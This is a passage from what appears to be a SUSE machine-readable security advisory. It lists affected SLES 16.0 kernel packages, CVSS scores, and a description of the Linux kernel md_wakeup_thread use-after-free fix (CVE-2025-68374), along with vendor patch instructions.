"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68372"
},
{
"cve": "CVE-2025-68374",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68374"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd: fix rcu protection in md_wakeup_thread\n\nWe attempted to use RCU to protect the pointer \u0027thread\u0027, but directly\npassed the value when calling md_wakeup_thread(). This means that the\nRCU pointer has been acquired before rcu_read_lock(), which renders\nrcu_read_lock() ineffective and could lead to a use-after-free.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68374",
"url": "https://www.suse.com/security/cve/CVE-2025-68374"
},
{
"category": "external",
"summary": "SUSE Bug 1255530 for CVE-2025-68374",
"url": "https://bugzilla.suse.com/1255530"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
